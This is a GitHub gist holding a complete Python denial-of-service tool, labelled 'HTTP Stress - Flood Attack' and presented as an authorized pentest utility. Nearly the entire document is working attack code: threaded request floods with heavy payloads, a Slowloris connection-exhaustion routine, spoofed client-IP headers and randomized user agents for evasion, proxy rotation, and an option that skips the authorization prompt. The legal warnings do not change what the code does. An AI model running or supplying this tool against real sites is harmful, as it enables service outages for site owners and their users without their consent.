Created
September 3, 2025 11:13
-
-
Save marcostolosa/02e6fb44f31c42dbeddc242eefba602d to your computer and use it in GitHub Desktop.
HTTP Stress - Flood Attack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
HTTP Stress Testing Tool - Educational & Authorized Pentest Only | |
Author: Security Research Team | |
Version: 2.0 Professional Edition | |
⚠️ AVISO LEGAL: Use APENAS com autorização escrita do proprietário do sistema | |
Violação = Crime (Lei 12.737/2012 - Brasil) | CFAA (EUA) | |
""" | |
import threading | |
import requests | |
import time | |
import random | |
import string | |
import argparse | |
import json | |
import socket | |
import ssl | |
import hashlib | |
from datetime import datetime | |
from collections import deque | |
from urllib.parse import urlparse | |
import warnings | |
import sys | |
import os | |
from concurrent.futures import ThreadPoolExecutor, as_completed | |
import signal | |
# Desabilita avisos SSL para testes | |
warnings.filterwarnings('ignore', category=requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
class Colors: | |
"""Cores para output no terminal""" | |
RED = '\033[91m' | |
GREEN = '\033[92m' | |
YELLOW = '\033[93m' | |
BLUE = '\033[94m' | |
PURPLE = '\033[95m' | |
CYAN = '\033[96m' | |
WHITE = '\033[97m' | |
RESET = '\033[0m' | |
BOLD = '\033[1m' | |
class HTTPStressTester: | |
def __init__(self, target_url, config): | |
self.target_url = target_url | |
self.config = config | |
self.stats = { | |
'total_requests': 0, | |
'successful': 0, | |
'failed': 0, | |
'status_codes': {}, | |
'response_times': deque(maxlen=1000), | |
'bytes_sent': 0, | |
'bytes_received': 0, | |
'start_time': time.time() | |
} | |
self.running = True | |
self.lock = threading.Lock() | |
# User-Agents realistas e atualizados | |
self.user_agents = [ | |
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0", | |
"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 Safari/17.1", | |
"Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0", | |
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0.0.0", | |
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) Mobile/15E148", | |
"Mozilla/5.0 (Android 14; Mobile; rv:120.0) Firefox/120.0", | |
"curl/8.4.0", | |
"Python-urllib/3.11", | |
"Googlebot/2.1 (+http://www.google.com/bot.html)", | |
"Custom-Scanner/1.0 (Pentest Tool)" | |
] | |
# Proxies para rotação (opcional) | |
self.proxies = self.load_proxies() if config.get('proxy_file') else [] | |
# Headers adicionais para evasão | |
self.extra_headers = [ | |
{"X-Forwarded-For": self.generate_random_ip()}, | |
{"X-Real-IP": self.generate_random_ip()}, | |
{"X-Originating-IP": self.generate_random_ip()}, | |
{"Client-IP": self.generate_random_ip()}, | |
{"CF-Connecting-IP": self.generate_random_ip()}, | |
] | |
def generate_random_ip(self): | |
"""Gera IP aleatório para spoofing de headers""" | |
return f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}" | |
def load_proxies(self): | |
"""Carrega lista de proxies de arquivo""" | |
proxies = [] | |
if os.path.exists(self.config.get('proxy_file', '')): | |
with open(self.config['proxy_file'], 'r') as f: | |
for line in f: | |
line = line.strip() | |
if line and not line.startswith('#'): | |
proxies.append({'http': line, 'https': line}) | |
return proxies | |
def generate_payload(self, attack_type='random'): | |
"""Gera diferentes tipos de payload baseado no ataque""" | |
payloads = { | |
'random': lambda: ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(100, 1000))), | |
'json': lambda: json.dumps({ | |
'user': ''.join(random.choices(string.ascii_letters, k=10)), | |
'data': ''.join(random.choices(string.ascii_letters + string.digits, k=500)), | |
'timestamp': str(datetime.now()), | |
'session': hashlib.md5(str(random.random()).encode()).hexdigest() | |
}), | |
'xml': lambda: f"""<?xml version="1.0"?> | |
<request> | |
<user>{random.randint(1000, 9999)}</user> | |
<data>{''.join(random.choices(string.ascii_letters, k=200))}</data> | |
<timestamp>{datetime.now()}</timestamp> | |
</request>""", | |
'form': lambda: '&'.join([f"field{i}={''.join(random.choices(string.ascii_letters, k=50))}" | |
for i in range(random.randint(5, 20))]), | |
'multipart': lambda: self.generate_multipart_data(), | |
'slowloris': lambda: ''.join(random.choices(string.ascii_letters, k=1)), # Pequeno para Slowloris | |
'heavy': lambda: ''.join(random.choices(string.printable, k=random.randint(5000, 10000))), # Payload pesado | |
} | |
return payloads.get(attack_type, payloads['random'])() | |
def generate_multipart_data(self): | |
"""Gera dados multipart/form-data""" | |
boundary = ''.join(random.choices(string.ascii_letters + string.digits, k=16)) | |
data = f"--{boundary}\r\n" | |
data += f'Content-Disposition: form-data; name="file"; filename="test.txt"\r\n' | |
data += "Content-Type: text/plain\r\n\r\n" | |
data += ''.join(random.choices(string.ascii_letters, k=1000)) | |
data += f"\r\n--{boundary}--\r\n" | |
return data | |
def get_random_headers(self): | |
"""Retorna headers randomizados para evasão""" | |
headers = { | |
"User-Agent": random.choice(self.user_agents), | |
"Accept": random.choice([ | |
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", | |
"application/json, text/plain, */*", | |
"*/*", | |
"text/html,application/xhtml+xml" | |
]), | |
"Accept-Language": random.choice(["en-US,en;q=0.5", "pt-BR,pt;q=0.8", "es-ES,es;q=0.9"]), | |
"Accept-Encoding": random.choice(["gzip, deflate", "gzip, deflate, br", "identity"]), | |
"Cache-Control": random.choice(["no-cache", "max-age=0", "no-store"]), | |
"Connection": random.choice(["keep-alive", "close"]) if not self.config.get('slowloris') else "keep-alive", | |
} | |
# Adiciona headers extras aleatoriamente | |
if random.random() > 0.5: | |
headers.update(random.choice(self.extra_headers)) | |
# Headers específicos por tipo de ataque | |
if self.config.get('attack_type') == 'json': | |
headers["Content-Type"] = "application/json" | |
elif self.config.get('attack_type') == 'xml': | |
headers["Content-Type"] = "application/xml" | |
elif self.config.get('attack_type') == 'multipart': | |
headers["Content-Type"] = f"multipart/form-data; boundary={random.randint(1000000, 9999999)}" | |
else: | |
headers["Content-Type"] = "application/x-www-form-urlencoded" | |
return headers | |
def perform_request(self, session, method='POST'): | |
"""Executa uma requisição HTTP com métricas""" | |
proxy = random.choice(self.proxies) if self.proxies else None | |
headers = self.get_random_headers() | |
payload = self.generate_payload(self.config.get('attack_type', 'random')) | |
start_time = time.time() | |
try: | |
if method == 'POST': | |
response = session.post( | |
self.target_url, | |
data=payload, | |
headers=headers, | |
proxies=proxy, | |
timeout=self.config.get('timeout', 10), | |
verify=False, | |
allow_redirects=self.config.get('follow_redirects', False) | |
) | |
elif method == 'GET': | |
response = session.get( | |
self.target_url, | |
headers=headers, | |
proxies=proxy, | |
timeout=self.config.get('timeout', 10), | |
verify=False, | |
allow_redirects=self.config.get('follow_redirects', False) | |
) | |
elif method == 'HEAD': | |
response = session.head( | |
self.target_url, | |
headers=headers, | |
proxies=proxy, | |
timeout=self.config.get('timeout', 5), | |
verify=False | |
) | |
else: # PUT, DELETE, PATCH, etc | |
response = session.request( | |
method, | |
self.target_url, | |
data=payload, | |
headers=headers, | |
proxies=proxy, | |
timeout=self.config.get('timeout', 10), | |
verify=False | |
) | |
response_time = time.time() - start_time | |
# Atualiza estatísticas | |
with self.lock: | |
self.stats['total_requests'] += 1 | |
self.stats['successful'] += 1 | |
self.stats['status_codes'][response.status_code] = \ | |
self.stats['status_codes'].get(response.status_code, 0) + 1 | |
self.stats['response_times'].append(response_time) | |
self.stats['bytes_sent'] += len(payload.encode()) if payload else 0 | |
self.stats['bytes_received'] += len(response.content) | |
return True, response.status_code, response_time | |
except requests.exceptions.Timeout: | |
with self.lock: | |
self.stats['total_requests'] += 1 | |
self.stats['failed'] += 1 | |
return False, 'TIMEOUT', 0 | |
except requests.exceptions.ConnectionError: | |
with self.lock: | |
self.stats['total_requests'] += 1 | |
self.stats['failed'] += 1 | |
return False, 'CONNECTION_ERROR', 0 | |
except Exception as e: | |
with self.lock: | |
self.stats['total_requests'] += 1 | |
self.stats['failed'] += 1 | |
return False, str(e), 0 | |
def slowloris_attack(self): | |
"""Implementa ataque Slowloris (mantém conexões abertas)""" | |
sockets = [] | |
# Cria sockets iniciais | |
for _ in range(self.config.get('threads', 50)): | |
try: | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
sock.settimeout(4) | |
parsed = urlparse(self.target_url) | |
host = parsed.hostname | |
port = parsed.port or (443 if parsed.scheme == 'https' else 80) | |
if parsed.scheme == 'https': | |
sock = ssl.wrap_socket(sock) | |
sock.connect((host, port)) | |
sock.send(f"GET {parsed.path or '/'} HTTP/1.1\r\n".encode()) | |
sock.send(f"Host: {host}\r\n".encode()) | |
sock.send(f"User-Agent: {random.choice(self.user_agents)}\r\n".encode()) | |
sockets.append(sock) | |
with self.lock: | |
self.stats['total_requests'] += 1 | |
self.stats['successful'] += 1 | |
except Exception as e: | |
with self.lock: | |
self.stats['failed'] += 1 | |
# Mantém conexões vivas | |
while self.running: | |
for sock in sockets: | |
try: | |
sock.send(f"X-header-{random.randint(1,5000)}: {random.randint(1,5000)}\r\n".encode()) | |
with self.lock: | |
self.stats['bytes_sent'] += 50 | |
except: | |
sockets.remove(sock) | |
try: | |
# Recria socket morto | |
new_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
new_sock.settimeout(4) | |
if parsed.scheme == 'https': | |
new_sock = ssl.wrap_socket(new_sock) | |
new_sock.connect((host, port)) | |
new_sock.send(f"GET {parsed.path or '/'} HTTP/1.1\r\n".encode()) | |
new_sock.send(f"Host: {host}\r\n".encode()) | |
sockets.append(new_sock) | |
except: | |
pass | |
time.sleep(random.uniform(10, 20)) | |
def worker_thread(self): | |
"""Thread worker principal para ataques normais""" | |
session = requests.Session() | |
# Configurações de performance | |
adapter = requests.adapters.HTTPAdapter( | |
pool_connections=100, | |
pool_maxsize=100, | |
max_retries=0 | |
) | |
session.mount('http://', adapter) | |
session.mount('https://', adapter) | |
methods = self.config.get('methods', ['POST']) | |
while self.running: | |
method = random.choice(methods) | |
success, status, response_time = self.perform_request(session, method) | |
if self.config.get('verbose'): | |
timestamp = datetime.now().strftime('%H:%M:%S') | |
if success: | |
color = Colors.GREEN if status == 200 else Colors.YELLOW | |
print(f"{color}[{timestamp}] {method} → Status: {status} | Time: {response_time:.3f}s{Colors.RESET}") | |
else: | |
print(f"{Colors.RED}[{timestamp}] {method} → Failed: {status}{Colors.RESET}") | |
# Delay entre requisições | |
delay = self.config.get('delay', 0) | |
if delay > 0: | |
time.sleep(random.uniform(delay * 0.5, delay * 1.5)) | |
def print_stats(self): | |
"""Exibe estatísticas em tempo real""" | |
while self.running: | |
time.sleep(self.config.get('stats_interval', 5)) | |
with self.lock: | |
elapsed = time.time() - self.stats['start_time'] | |
rps = self.stats['total_requests'] / elapsed if elapsed > 0 else 0 | |
avg_response = sum(self.stats['response_times']) / len(self.stats['response_times']) \ | |
if self.stats['response_times'] else 0 | |
success_rate = (self.stats['successful'] / self.stats['total_requests'] * 100) \ | |
if self.stats['total_requests'] > 0 else 0 | |
print(f"\n{Colors.CYAN}{'='*60}") | |
print(f"{Colors.BOLD}📊 ESTATÍSTICAS DO TESTE - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.RESET}") | |
print(f"{Colors.CYAN}{'='*60}{Colors.RESET}") | |
print(f"⏱️ Tempo decorrido: {elapsed:.1f}s") | |
print(f"📨 Total de requisições: {self.stats['total_requests']}") | |
print(f"✅ Sucesso: {self.stats['successful']} ({success_rate:.1f}%)") | |
print(f"❌ Falhas: {self.stats['failed']}") | |
print(f"⚡ Requisições/seg: {rps:.2f}") | |
print(f"📊 Tempo médio resposta: {avg_response:.3f}s") | |
print(f"📤 Bytes enviados: {self.stats['bytes_sent'] / 1024:.2f} KB") | |
print(f"📥 Bytes recebidos: {self.stats['bytes_received'] / 1024:.2f} KB") | |
if self.stats['status_codes']: | |
print(f"\n{Colors.YELLOW}Status Codes:{Colors.RESET}") | |
for code, count in sorted(self.stats['status_codes'].items()): | |
percentage = (count / self.stats['total_requests'] * 100) | |
bar = '█' * int(percentage / 2) | |
print(f" {code}: {count:5d} ({percentage:5.1f}%) {bar}") | |
print(f"{Colors.CYAN}{'='*60}{Colors.RESET}") | |
def start(self): | |
"""Inicia o teste de stress""" | |
print(f"\n{Colors.PURPLE}{Colors.BOLD}") | |
print("╔═══════════════════════════════════════════════════════════╗") | |
print("║ HTTP STRESS TESTER - PROFESSIONAL v2.0 ║") | |
print("║ 🔒 AUTHORIZED USE ONLY 🔒 ║") | |
print("╚═══════════════════════════════════════════════════════════╝") | |
print(f"{Colors.RESET}") | |
print(f"\n{Colors.YELLOW}⚠️ AVISO LEGAL:{Colors.RESET}") | |
print("Este teste deve ser executado APENAS com autorização escrita!") | |
print("Uso não autorizado é CRIME federal (Lei 12.737/2012 - Brasil)") | |
# Confirmação de segurança | |
if not self.config.get('skip_confirmation'): | |
confirm = input(f"\n{Colors.RED}Você possui autorização escrita para testar {self.target_url}? (yes/no): {Colors.RESET}") | |
if confirm.lower() != 'yes': | |
print(f"{Colors.RED}Teste cancelado. Execute apenas com autorização!{Colors.RESET}") | |
return | |
print(f"\n{Colors.GREEN}🚀 Iniciando teste de stress...{Colors.RESET}") | |
print(f"🎯 Alvo: {self.target_url}") | |
print(f"🧵 Threads: {self.config.get('threads', 10)}") | |
print(f"⚡ Tipo de ataque: {self.config.get('attack_type', 'random')}") | |
print(f"🔄 Métodos: {', '.join(self.config.get('methods', ['POST']))}") | |
# Inicia thread de estatísticas | |
stats_thread = threading.Thread(target=self.print_stats) | |
stats_thread.daemon = True | |
stats_thread.start() | |
# Escolhe tipo de ataque | |
if self.config.get('slowloris'): | |
print(f"\n{Colors.YELLOW}Executando ataque Slowloris...{Colors.RESET}") | |
self.slowloris_attack() | |
else: | |
# Cria pool de threads | |
with ThreadPoolExecutor(max_workers=self.config.get('threads', 10)) as executor: | |
futures = [] | |
for _ in range(self.config.get('threads', 10)): | |
future = executor.submit(self.worker_thread) | |
futures.append(future) | |
try: | |
# Aguarda conclusão ou interrupção | |
for future in as_completed(futures): | |
pass | |
except KeyboardInterrupt: | |
print(f"\n\n{Colors.YELLOW}⚠️ Interrompendo teste...{Colors.RESET}") | |
self.running = False | |
def stop(self): | |
"""Para o teste""" | |
self.running = False | |
# Estatísticas finais | |
elapsed = time.time() - self.stats['start_time'] | |
print(f"\n{Colors.GREEN}{'='*60}") | |
print(f"{Colors.BOLD}📊 RELATÓRIO FINAL{Colors.RESET}") | |
print(f"{Colors.GREEN}{'='*60}{Colors.RESET}") | |
print(f"Duração total: {elapsed:.1f} segundos") | |
print(f"Total de requisições: {self.stats['total_requests']}") | |
print(f"Taxa média: {self.stats['total_requests']/elapsed:.2f} req/s") | |
print(f"Taxa de sucesso: {(self.stats['successful']/self.stats['total_requests']*100):.1f}%") | |
print(f"{Colors.GREEN}{'='*60}{Colors.RESET}") | |
def main(): | |
parser = argparse.ArgumentParser( | |
description="HTTP Stress Tester - Professional Pentesting Tool", | |
formatter_class=argparse.RawDescriptionHelpFormatter, | |
epilog=""" | |
Exemplos de uso: | |
python3 stress_test.py https://authorized-target.com -t 50 -d 0.1 | |
python3 stress_test.py https://lab.local --slowloris | |
python3 stress_test.py https://api.test.com --attack-type json --methods POST PUT | |
python3 stress_test.py https://target.com --proxy-file proxies.txt | |
""" | |
) | |
# Argumentos principais | |
parser.add_argument("url", help="URL alvo (deve ter autorização!)") | |
parser.add_argument("-t", "--threads", type=int, default=10, | |
help="Número de threads concorrentes (padrão: 10)") | |
parser.add_argument("-d", "--delay", type=float, default=0, | |
help="Delay entre requisições em segundos (padrão: 0)") | |
# Tipos de ataque | |
parser.add_argument("--attack-type", choices=['random', 'json', 'xml', 'form', | |
'multipart', 'slowloris', 'heavy'], | |
default='random', help="Tipo de payload do ataque") | |
parser.add_argument("--slowloris", action="store_true", | |
help="Executa ataque Slowloris (mantém conexões abertas)") | |
# Métodos HTTP | |
parser.add_argument("--methods", nargs='+', | |
default=['POST'], | |
choices=['GET', 'POST', 'PUT', 'DELETE', 'HEAD', 'PATCH', 'OPTIONS'], | |
help="Métodos HTTP a usar (padrão: POST)") | |
# Configurações avançadas | |
parser.add_argument("--timeout", type=int, default=10, | |
help="Timeout para requisições em segundos (padrão: 10)") | |
parser.add_argument("--proxy-file", help="Arquivo com lista de proxies") | |
parser.add_argument("--follow-redirects", action="store_true", | |
help="Segue redirecionamentos HTTP") | |
parser.add_argument("--stats-interval", type=int, default=5, | |
help="Intervalo de atualização de estatísticas em segundos") | |
# Output e debug | |
parser.add_argument("-v", "--verbose", action="store_true", | |
help="Modo verbose - mostra cada requisição") | |
parser.add_argument("-q", "--quiet", action="store_true", | |
help="Modo silencioso - apenas estatísticas finais") | |
parser.add_argument("--skip-confirmation", action="store_true", | |
help="Pula confirmação de autorização (USE COM CUIDADO!)") | |
args = parser.parse_args() | |
# Validação de URL | |
parsed = urlparse(args.url) | |
if not parsed.scheme or not parsed.netloc: | |
print(f"{Colors.RED}❌ URL inválida! Use formato: https://example.com{Colors.RESET}") | |
sys.exit(1) | |
# Configuração | |
config = { | |
'threads': args.threads, | |
'delay': args.delay, | |
'attack_type': args.attack_type, | |
'slowloris': args.slowloris, | |
'methods': args.methods, | |
'timeout': args.timeout, | |
'proxy_file': args.proxy_file, | |
'follow_redirects': args.follow_redirects, | |
'stats_interval': args.stats_interval, | |
'verbose': args.verbose, | |
'quiet': args.quiet, | |
'skip_confirmation': args.skip_confirmation | |
} | |
# Inicializa e executa | |
tester = HTTPStressTester(args.url, config) | |
# Handler para CTRL+C | |
def signal_handler(sig, frame): | |
print(f"\n{Colors.YELLOW}Recebido sinal de interrupção...{Colors.RESET}") | |
tester.stop() | |
sys.exit(0) | |
signal.signal(signal.SIGINT, signal_handler) | |
try: | |
tester.start() | |
except Exception as e: | |
print(f"{Colors.RED}❌ Erro: {e}{Colors.RESET}") | |
sys.exit(1) | |
finally: | |
tester.stop() | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment